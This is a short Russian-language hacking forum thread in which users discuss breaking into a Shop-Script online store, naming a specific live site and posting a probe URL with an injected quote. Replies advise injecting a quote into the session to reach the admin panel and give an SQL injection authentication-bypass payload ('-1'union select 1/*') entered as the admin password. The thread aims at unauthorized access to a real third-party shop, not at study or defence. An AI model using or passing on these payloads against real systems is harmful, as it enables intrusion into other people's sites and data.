вем доборого время суток, кто нить знает есть ли хоть какието уязвимости в инет магазине Shop-Script, пример есть здесь - miniden.h17.ru я думаю мож что-то в коментариях товара?

http://miniden.h17.ru/index.php?categoryID=3'

Вот нашел - _http://www.exploit.in/modules.php?name=News&file=view&news_id=1263
Но ничего оттуда не срабатывает...
Xss присутствуют как и sql-ошибки...только не думаю, что от них в данный момент толка много...могу ошибаться...

P.s. Он-лайн магазин на бесплатном хостинге это жесть :)

кавычку в сесию вбей и в админку топай.

кавычку в сесию вбей и в админку топай.
и этот патифон ещё работает? ндааа... хотя ежедневно встречаю такое же тока не в сессии
login: admin
password: -1'union select 1/*
ENTER => Welcom Administrator =))))))

Тема закрыта.